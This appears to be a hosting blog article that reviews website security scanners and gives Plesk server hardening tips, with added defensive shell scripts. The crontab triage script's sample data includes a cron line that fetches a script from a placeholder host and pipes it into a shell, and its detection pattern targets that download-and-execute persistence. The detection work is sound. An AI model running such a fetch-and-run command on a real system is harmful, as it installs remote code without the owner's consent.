Tools To Scan For Security Vulnerabilities and Malware

Web security is something we should all be doing nowadays, because there are literally hundreds of different potential ways that any site can become compromised. You should regularly scan for security vulnerabilities to stay safe from these sorts of potential problems: cross-site scripting, vulnerable components, DOM-based vulnerabilities, SQL injection, cross-site request forgery, and CRLF/XXE/HTTP injection.

Let’s face it, we don’t always scan for security vulnerabilities as much as we should. It’s an easy task to overlook because so much needs to go into designing, testing, and marketing a website. We’re often more focused on success than safety, but that really is a false economy. It’s like building a fabulous house but forgetting to put a lock on the front door. Security underpins everything else you do with your property, so you can’t afford to let it slip. If you don’t scan for security vulnerabilities, then the chances are good that someone, somewhere will find a way in and cause havoc. If you feel put off from thinking about security because it seems complicated, don’t worry. There are plenty of tools out there that will scan your website for security vulnerabilities. Some of them even offer free trials so you can road test them to see if they’re going to work for you:

SUCURI

SUCURI is free and is widely used to scan websites for malware. It’s great at tracking down malware and scanning for security issues, and it will report on malware blacklisting status, show you points where spam has been injected, and point out instances where someone has made unwelcome changes to your site. If you’re using popular platforms such as WordPress, Joomla, Magento, Drupal or phpBB, then it’s going to work just fine for you.

Quttera

Quttera can scan a website for malware and possible exploits. It combs your website for potentially malicious and suspicious files, using PhishTank, Safe Browsing (Google, Yandex), and Malware Domain List.

Qualys

SSL Server Test by Qualys looks for misconfigured SSL/TLS and for inherent weaknesses on your site. It checks your https:// URL and reports the expiry date, the overall rating, ciphers, SSL/TLS versions, a handshake simulation, protocol details, BEAST and other things too.

It’s important to run the Qualys test every time you make a change to SSL/TLS. It can scan for security vulnerabilities or scan a website for malware, so you’ll be assured that any changes you’ve made are safe.

Intruder

Intruder is based in the cloud and it looks for weaknesses in the whole web app set-up. It’s engineered to deliver a level of security protection that makes it suitable for governments, banks and similar enterprises that call for high-end safety, and its scanning engine is simple to use as well.

Its comprehensive security features allow it to identify:

  • absent patches
  • incorrect configurations
  • web application issues including SQL injection and cross-site scripting
  • CMS problems

Intruder can scan for website security vulnerabilities and put the results in order of priority according to their context to save you time. It can also proactively scan your systems for the most recently identified weaknesses. It can integrate with major cloud providers (AWS, GCP, Azure) as well as Slack and Jira.

Detectify

Ethical hackers lend their expertise to ensure Detectify keeps your website and web apps secure with automatic security and monitoring of assets. It can identify upwards of 1500 potential threats.

It can scan for weaknesses covering the OWASP Top 10, CORS, Amazon S3 buckets, and misconfigured DNS. It has Asset Monitoring, and it keeps a non-stop eye on your subdomains, searching for takeovers and alerting you if anything anomalous is picked up.

Detectify’s pricing plans come in three flavors, called Starter, Professional, and Enterprise, and they all come with a two-week free trial, no credit card needed.

UpGuard

UpGuard Web Scan can assess risk using information that’s publicly available. It can organize test results into these groupings:

  • website threats
  • email threats
  • network security
  • malware and phishing
  • brand defense

It’s great at quickly giving you insights about where your website is at the moment, security-wise.

Pentest-Tools

This scanner is just one of many tools on offer from Pentest-Tools. It can gather information, test web apps, CMS, infrastructure, and SSL. Its main purpose is to find the most frequently-occurring web app vulnerabilities and problems with server configuration.

There’s a basic version that does passive web security scanning, and it’s adept at finding things like unsafe cookie settings, unsafe HTTP headers, and out-of-date server software. It will grant you two full scans for free, and that will be enough to give you a very good overview of any problems with things like local file inclusion, SQL injection, OS command injection, and XSS, for example.
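
As an added example (not Pentest-Tools code or output), this shell function runs the kind of passive checks described above over a saved response header dump. The sample headers, the finding labels, and the list of expected headers are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example: passive checks over a saved HTTP response header dump.
# SAMPLE_HEADERS is constructed; in practice pipe in `curl -sI <your URL>`.
SAMPLE_HEADERS='HTTP/1.1 200 OK
Server: Apache/2.4.10 (Debian)
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=abc123; path=/
Set-Cookie: lang=en; Secure; HttpOnly; SameSite=Lax
X-Content-Type-Options: nosniff'

# check_headers: reads headers on stdin, prints one finding per line.
# Finding labels and the expected-header list are choices made for this example.
check_headers() {
  tr -d '\r' | awk '
    {
      sep = index($0, ":")
      if (sep == 0) next                      # status line or blank line
      name = tolower(substr($0, 1, sep - 1))  # header names are case-insensitive
      value = substr($0, sep + 1)
      sub(/^[ \t]+/, "", value)
      seen[name] = 1
      if (name == "set-cookie") {
        cookie = value
        sub(/=.*/, "", cookie)                # keep only the cookie name
        attrs = tolower(value)
        if (attrs !~ /; *secure/)   print "cookie-missing-secure " cookie
        if (attrs !~ /; *httponly/) print "cookie-missing-httponly " cookie
      }
      # A version in the banner can be compared against known-old releases.
      if (name == "server" && value ~ /[0-9]/) print "server-version-disclosed " value
    }
    END {
      n = split("strict-transport-security content-security-policy x-content-type-options x-frame-options", want, " ")
      for (i = 1; i <= n; i++)
        if (!(want[i] in seen)) print "missing-header " want[i]
    }'
}

printf '%s\n' "$SAMPLE_HEADERS" | check_headers
```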

Observatory

Mozilla has launched Observatory, which can scan a website for malware and has other security features. It validates the security of OWASP headers, checks TLS best practices and carries out third-party tests from SSL Labs, High-Tech Bridge, Security Headers, HSTS Preload, and others.

Conclusion

All of these powerful tools can give you a great deal of insight into the kind of vulnerabilities that might affect your website, and enough of them have free offers that you’ll be able to decide which of them will serve you best.

Best practices to strengthen Plesk server security

Server security is the core of server management for any web hoster and server admin. Any online business should take server security seriously. Here we’ll explore the most important aspects of hardening Plesk servers and monitoring them for security vulnerabilities.

Plesk Server Security Hardening – Generic Steps

The latest Plesk has an enhanced level of security right after installation. Recently, Plesk launched Advisor, which unifies the best possible security practices and performance tune-up of the server and hosted websites. At the same time, it’s a good idea to ensure the following routine steps:

  • Ensure regular Plesk updates
  • Change password strength to Strong
  • Use two-step verification by installing Google Authenticator
  • Use SSL/TLS to secure mail server
  • Set up SFTP connections
  • Limit administrative access to the system
  • Limit remote access via XML API
  • Actively use Web Application Firewall
  • Actively use WordPress Toolkit Security Check
  • Set automatic updates for WordPress instances
  • Ensure outdated web applications are not used, or update them on a regular basis. Failure to follow this rule may result in unexpected security vulnerabilities
  • Use VirusTotal Website Check to check existing websites

Use a firewall to block all ports that are not in use.

Server Security Tips for Plesk under Linux

  • Use a key file for SSH access
  • Use a custom port for SSH connections
  • Disable SSH authentication for the root user
  • Turn off Perl/Python for the website if these languages are not used, and do not use mod_perl/mod_python
  • Use Opsani vulnerability scanner
  • Set up Fail2Ban to prevent hacking attempts
  • Avoid PHP handlers served as an Apache module – not a secure practice
  • Ensure automatic updates of system packages are on
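
As an added example (not Plesk's own tooling), the script below audits an `sshd_config` against the three SSH items in this list: key-only access, a custom port, and no root login. Both sample configs, the check labels, and the reading of "key file access" as `PasswordAuthentication no` are assumptions of this example; `Include` files are not followed.

```shell
#!/bin/sh
# Added example: audit an sshd_config against the three SSH items in the list.
# Both sample configs below are constructed for illustration.
WEAK_CONFIG='Port 22
PermitRootLogin yes
#PasswordAuthentication no
Match User backup
    PasswordAuthentication no'

HARDENED_CONFIG='Port 2222
PermitRootLogin no
PasswordAuthentication no
PermitRootLogin yes'

# audit_sshd [FILE...]: reads the config (stdin if no file), prints PASS/FAIL lines.
audit_sshd() {
  awk '
    function verdict(ok) { return ok ? "PASS" : "FAIL" }
    /^[ \t]*#/ || NF == 0 { next }                 # skip comments and blanks
    { key = tolower($1); val = tolower($2) }       # keywords are case-insensitive
    key == "match" { exit }                        # later lines are conditional
    key == "port" {                                # Port may be given several times
      ports = ports (ports == "" ? "" : ",") val
      if (val == "22") has22 = 1
      next
    }
    !(key in conf) { conf[key] = val }             # sshd keeps the first value seen
    END {
      # OpenSSH defaults apply when a keyword is absent.
      root = ("permitrootlogin" in conf) ? conf["permitrootlogin"] : "prohibit-password"
      pass = ("passwordauthentication" in conf) ? conf["passwordauthentication"] : "yes"
      print verdict(ports != "" && !has22) " custom-port Port=" (ports == "" ? "22" : ports)
      print verdict(root == "no") " no-root-login PermitRootLogin=" root
      print verdict(pass == "no") " key-only-auth PasswordAuthentication=" pass
    }' "$@"
}

echo "weak config:";     printf '%s\n' "$WEAK_CONFIG"     | audit_sshd
echo "hardened config:"; printf '%s\n' "$HARDENED_CONFIG" | audit_sshd
```

On a live server, `sshd -T` prints the effective configuration with defaults and included files resolved, so its output is the authoritative input for checks like these.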

Server Security Tips for Plesk under Windows

  • Custom port usage for RDP connections is a must
  • Get rid of unused programming languages
  • Make sure you install the latest Windows updates
  • Restrict users from overriding handlers via web.config files
  • Keep DDoS protection enabled

What to do if server security is compromised

What we suggest here is migration to a new server. With a successful attack, intruders raise their privileges to root level, meaning they can do anything with the server. And just because you find malware or rootkits during the investigation and clean them doesn’t guarantee there are no others inside your system. It’s possible to load malware directly into RAM. There can be backdoors enabled, or even ordinary cron jobs that use wget to download rootkits from already infected servers.
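
As an added example (not from the original article), this read-only triage function lists crontab entries that fetch remote content, the persistence route mentioned above. It goes slightly beyond the text by also matching `curl`; the sample crontab, the `example.invalid` host, and the severity labels are constructed for illustration.

```shell
#!/bin/sh
# Added example: read-only triage of crontab entries that fetch remote content.
# SAMPLE_CRON is constructed; example.invalid is a placeholder host.
SAMPLE_CRON='# system crontab
MAILTO=root
17 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * www-data wget -q -O - http://example.invalid/u.sh | sh
0 4 * * 0 root curl -fsS https://example.invalid/healthcheck >/dev/null'

# scan_cron [FILE...]: reads crontab text (stdin if no file) and prints
# "<severity> <file>:<line>: <entry>" for every job that calls wget or curl.
scan_cron() {
  awk '
    /^[ \t]*#/ || NF == 0 { next }                     # comments and blank lines
    /^[ \t]*[A-Za-z_][A-Za-z0-9_]*[ \t]*=/ { next }    # environment settings (MAILTO=...)
    {
      low = " " tolower($0) " "                        # pad so word boundaries are simple
      if (low !~ /[^a-z0-9_](wget|curl)[^a-z0-9_]/) next
      sev = "review"                                   # may be legitimate, needs a look
      if (low ~ /[|][ \t]*(ba|da)?sh[^a-z]/) sev = "high"   # download piped into a shell
      src = (FILENAME == "" || FILENAME == "-") ? "stdin" : FILENAME
      print sev " " src ":" FNR ": " $0
    }' "$@"
}

printf '%s\n' "$SAMPLE_CRON" | scan_cron
```

The function only reads its input, so it can be pointed at copies of `/etc/crontab`, `/etc/cron.d/*` and the per-user spool files without altering evidence.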

Restoring the server from a previous snapshot doesn’t guarantee a problem-free server either, because in many cases it’s not clear when exactly the server was hacked and the rootkits were uploaded to it.

How to identify the source of the problem

When using security solutions dedicated to scanning for rootkits/malware, you need to understand the following: these solutions use only already known patterns to identify the presence of malware and can be completely useless against new malicious software. To be 100% sure how the server was hacked, please contact a security audit company that specializes in such cases. Please do not change anything before the investigation, to avoid losing traces.